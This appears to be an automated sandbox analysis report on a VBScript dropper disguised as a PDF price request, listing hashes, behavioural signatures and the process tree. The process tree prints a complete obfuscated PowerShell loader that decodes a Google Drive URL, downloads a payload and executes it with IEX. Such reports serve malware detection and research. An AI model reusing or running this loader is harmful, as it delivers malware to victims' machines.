Analysis
-
max time kernel
149s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
18-11-2024 05:59
Static task
static1
Behavioral task
behavioral1
Sample
Narxlarni so'rash (SOLIS TRACTORS UZBEKISTAN) 2024·pdf.vbs
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Narxlarni so'rash (SOLIS TRACTORS UZBEKISTAN) 2024·pdf.vbs
Resource
win10v2004-20241007-en
General
-
Target
Narxlarni so'rash (SOLIS TRACTORS UZBEKISTAN) 2024·pdf.vbs
-
Size
15KB
-
MD5
57a98d83eebfd7536413c107b5561bcd
-
SHA1
ab660a6cdb0bd632e307fb5b69f895df31ef4c67
-
SHA256
1b32b2a0b09264362731fefb3212dd89d0c5a588e202fe8cb0cc07b0612b06ae
-
SHA512
9c985a943bcd416e290374c29619dfd7011450f8d469b3d899de2235a2dd79d2b1eb5d845ea199ecd95f5349f2fec137aab02bc46697f778a8ee95376ce80608
-
SSDEEP
384:YwAAp2YC86mHC6GpbW+lqPIjijLUgZSPDctjjPhnwLCeFFBDq43UVcm9:YopU6OqPy6LUgaGvlwLZFFBD/3UqY
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2864 WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2752 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2752 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2864 wrote to memory of 2752 2864 WScript.exe 30 PID 2864 wrote to memory of 2752 2864 WScript.exe 30 PID 2864 wrote to memory of 2752 2864 WScript.exe 30
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Narxlarni so'rash (SOLIS TRACTORS UZBEKISTAN) 2024·pdf.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Geochemically Ejerlst Attributnavns Fortrende Feminality Hereticas #><#Afluringernes Pestbyld Panpipes #>$Thongy='Forraadnelsernes';function Counterreforms($Kubikindholds){If ($host.DebuggerEnabled) {$Elefantordnerne=4} for ($Pseudosymmetrical123=$Elefantordnerne;;$Pseudosymmetrical123+=5){if(!$Kubikindholds[$Pseudosymmetrical123]) { break }$Skydeskive+=$Kubikindholds[$Pseudosymmetrical123]}$Skydeskive}function Natbordets($Dokhavns){ .($Gallinule) ($Dokhavns)}$Akademiserings=Counterreforms 'VincnLoynEA peTPeri.SlaawVensehomob KntC Ulfl.yclIVitrECultNReplt';$Officialese=Counterreforms 'R toMBut oCl nzFulliadd,lBiffl We aPe,p/';$Buttes=Counterreforms 'bestT betlA grs fug1 nke2';$Logaritmen='Pogr[Ma dnKomtespriTMeth.S enSLusceVicurIn,ovFinniFil,CIbr e,ejiPForhO raiPiroNGranT PorMSikkALsean OptA BosGP rieCephRYuru]Dobb:Icon:Re tSVexae UdecMarkUFeltR Un iVatttUpbuY duppTintRSpo OAfskt edsoHo.pcThr,oportL,arz=Stri$ remBCentulagetUdarT SkeeMakrS';$Officialese+=Counterreforms 'Coun5Fis..Alky0Flex Omfo( DisWLeuciIncanMermdOveroBredwPrefsMont AlchNYderTUnp Fjer1Carr0 P i.Cine0phot; san CentWUvgeiShepnSvin6Beza4o ea;Sade Me.txBuks6Kru 4Hind;Holo dlr FodvE ke: Swa1Tran3 hyl1 rak.Affa0Indb)D.co IdriGHarce Pr cConvk L,goKr k/ Ind2Nv e0F mi1Sc l0Unwi0 ho1 War0Birt1Hand BydeFSynciSys,r udeeUp.lf LeaoSt.mxYear/G.ns1Real3unbu1Depo.Merc0';$Outlearning=Counterreforms 'MidtU oarsAccleh verTrag- EndA W.aGEleceSpadNRebet';$Foreskriver=Counterreforms 'FilihKom tAngrt Qu p UnasChom:Telo/Lim /AfsvdSolbrbeliiSma v T ye Per. ieg Eduo Ga.ojerngOve lSupeeGraf. StjcCo,noSnkemUltr/EneruKa ec Str? MuleFastxFr lp Retostifr lkytMil,=krybdSgetoKanawStrinIndsl jefoSinga svadAuto&TrvaiI otd R d=S ag1NatraNedfAmuseZVoteB rafNOust5Snob- BukV Regw Se,xRatoq ,toxUgudsEmanSNynauFaneP SupBMathMEnchX Bar2Uns,8TricVFod.RBe.muUnusbOve UT ebnZeeiH UdvxHemo8Desao KluJ';$Kodelaasene231=Counterreforms 'Nonc>';$Gallinule=Counterreforms 'PhasIT,roeManeX';$Ransackers='Standardprogrammers';$Artolater='\Ostentation.Non';Natbordets (Counterreforms 'Pig $SkriG VenladopO Sh BDereALa.elFluo: HypPResuO Le,s etetpeireKejsx Sadi Jens GottAmerESaloNDeteTW bf=Euch$CoxoEciern fl v sam:HenvaMnempByg PChokDA riAgaudt AspAKany+fo a$ Beta.ubrrFedntR,gaoI.dsl C aASport SupEKurtr');Natbordets (Counterreforms ' I r$OptlG uneLT,peOO erbO.hyATo vlCh r:Acrik edkRBrani CrugAm.tsA meKPropa GromOverMOblae arbR Para HlotT.ni=,nvi$ C mF psOhygerReb.eforhsDystK ampr AfsIOuttV.ygre,verRBes.. katS injPColllGnawISa.mTtrae(N,en$M trkAfstoMispdSickEChemlBageA Beea,alks .fsE.hotnGrsre ste2Enek3 Rev1Fera)');Natbordets (Counterreforms $Logaritmen);$Foreskriver=$Krigskammerat[0];$Storico123=(Counterreforms 'Gesc$DentgDobbl R mo Spab Hena BefLFi,k:PindE tamPSofahKiesO PacdChorsquoa=G,apn fluEBaciw Kni-Fr bO fskbGobbjbetjEOxy c MesTsai PrepS GeryUngrsPoettAdene OvemDyna.Forb$Curtasuc KOptaA EksdKryde ,amMMikri DaiSHndtEErhvRRundIBrusNCoungMoloS');Natbordets ($Storico123);Natbordets (Counterreforms 'Till$BamaEOpsppAghohTtheoprocdJa rsPeda. ArgH LabePutraRevedMetreFontr BetsU or[Fist$ ,gnO MaruTramtElmal Neke AutaPe srDaarn Syni cann D mgD.bg]Cyc,=Shiv$.aceO Spif.odtfSciliOutscHeliiOpiuaUddilHalveModvsBi.ne');$Pulmotrachearia=Counterreforms 'Trow$CycaEartipR,nshLigno WoodUnf,sConq. anlDT pso Spiw Deln NedlStovoJyllaJackd TrkFForjiEnd lAfs eB,nt(Fear$Sla,FD nkoFor rdi fePilisSkonkJodtrAnvei.elpvGodkeNonsrConv,pret$S,ciBInsilOrniaC,afk SugkMokkeNondd Adee omosFall)';$Blakkedes=$Postexistent;Natbordets (Counterreforms 'Bila$HitcgConjLMinuo isB AkkAKombLskat:S,atpS.igrBortUAldeN enEFlatRb,urs Svo=Opht(mas tOvereOeveSRelitFred-WrigP,nhaaKonstJingh Pro Rum$Camub BunlZe,mAEmbekTel.K satE smadDanseDrabsmyth)');while (!$Pruners) {Natbordets (Counterreforms 'T nd$Necrg analSperoNotabNikkaFo,slm rk:AggrRUneqeSu ecHeteoUme uStenpBri s vi = kum$rengvi daoShipmTrebipseutS lgo') ;Natbordets $Pulmotrachearia;Natbordets (Counterreforms 'Ideos wr,t NarA WesRBio.TUdga- DepSCha,L Bu,eEremeBeziPSy f ,ilf4');Natbordets (Counterreforms ' Ove$K ltGre.tLAntaO,appbundeAMilil Liv: AmapSkrar H.rUKre nSkidEoverrJoshs V d=O.rr(KoortStanESorts oveTSkat-ProcPEcteAPoneTVarmHFjol Par$civibTjenLMisraChauKForskSkvaEIncuDV cteMar,SExu )') ;Natbordets (Counterreforms 'Fisk$Ti kGSkruL aboOG,ribCochAF jtLPh l:BasuiTeenn.yudDUforbConfYTaktg BadGFoxeEStauRGlateFrgnnGr es For=Hers$ vivg AfllMycoO devbA,tiALuftLThyr:quinA.einPgodbpRetieFondLStafSTaloiRe.uNEnhuB T,mlTentOSkatmCrissVoveTGhauECapirLacu+ ru+Hunn%Tang$PreckP.larSkudI Dr,gEnteS Spok Br.Ano rmAn oML nse T lrUndeAEnchtPleo.Selec BaroSympuMarcnSmaat') ;$Foreskriver=$Krigskammerat[$Indbyggerens]}$Brilleslangers=325720;$Sensitometrically=31471;Natbordets (Counterreforms 'Kl d$H,angInteLT,llO o,yb emoAUr ilGloc:PersQImpruPhreEkaprrVandiI leLBil LAalbae sp Aand= ryk ExingVildeIjolTFauv-BlaccNa oOSupenSyttt ShaETan NKanoTdr,p Tyvs$I flBraveL IndA RetkBolik Bl ededid IndeDabcS');Natbordets (Counterreforms 'Data$FamigInstlEuchoRettb iladepulHack: Ti,PFormhPityyRotolL gelVesio UnssD,imt P soSnacm C niMon,nAr baVisceGl.n2Udta6Krig Phth=fea, Fr [SammSUtnkyUdbrs StatHegneKn lmFidu. olfCF okoInfrnGenevQu neVentrRepat ta]Orme: ulm:DishFE nerInc,o PremdishB,raga klis useSpec6Breb4Wam S,rokt orsrJestiPrean,ekygsans(Arve$JoguQ enuIn.leRadirCroqiC,rdl urilDro aM xe)');Natbordets (Counterreforms 'Fald$O eyg Un LKystO pirB Pura.ommL,and: MulUMolenLe sfCasta,ensv CroOUltrU C nr sh IUnd,nKoorg lie Medh=n ph Opda[Pre,s etrYEo.uSnsvitHy.eE idemblik.n opT ,smeBondXPercTJon..Dob.eR,laNvinkCBib O,egedLoesi Me NHumogFall]M ga:Inde: ugAEle,sDmmeC Pe.i BigiUnc,. .erGBlinESesqtUnmeS Ex tTetrR G.iI rotNU bogBran(samm$FornpPsycHTeokyLynbl visLsstnOA.tis,etht nnOZippm Deti ,ugnHandA Came Bro2Stet6omby)');Natbordets (Counterreforms 'Malp$DeklG onoL Op oTor.b ,liaCa,tlA ad:Sno FMicrLFdreuFireGP titNonaSPro,KGallYSpaldCaudn FinIBrann LetgChroSRevebOni AEp,cnha,de A tR Hy NPer.eLys,= Ant$L ukuTretnUlstF BroaStorvPaciOS edu ilorDr.fi Fa nClasgHyge.GaluSUhanUAdvebuv.dSCatit rotR RedIPirrNSa,rG Und( Udk$ F uBFlygrWastiRet LVitilVittELouksL.niLTotoACostNNa rg xtreSpjtrPapis Dem,Kont$VaassFluieDimiNSandS subIDiffT teOT ksmTautev ejT HadrKod.IMau,CjemaAElevLCo wL GeyyCinq)');Natbordets $Flugtskydningsbanerne;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b